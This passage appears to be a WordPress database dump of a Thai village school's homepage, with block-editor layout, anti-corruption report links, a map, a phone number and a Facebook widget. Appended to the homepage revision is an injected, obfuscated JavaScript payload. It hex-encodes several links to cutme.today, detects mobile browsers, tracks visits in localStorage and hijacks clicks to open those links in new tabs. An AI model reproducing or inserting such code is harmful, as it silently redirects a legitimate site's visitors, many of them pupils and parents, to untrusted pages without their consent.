Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-01 09:55:34','2024-08-01 02:55:34','',14,'http://pakhaeng.ssk.in.th/?p=329',0,'revision','',0),
(330,1,'2024-08-01 10:10:37','2024-08-01 03:10:37','','ถาม-ตอบ ( Q&A )','','publish','open','closed','','%e0%b8%96%e0%b8%b2%e0%b8%a1-%e0%b8%95%e0%b8%ad%e0%b8%9a-qa','','','2024-08-01 10:13:48','2024-08-01 03:13:48','',0,'http://pakhaeng.ssk.in.th/?post_type=question&#038;p=330',0,'question','',1),
(342,1,'2024-08-01 10:30:23','2024-08-01 03:30:23','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"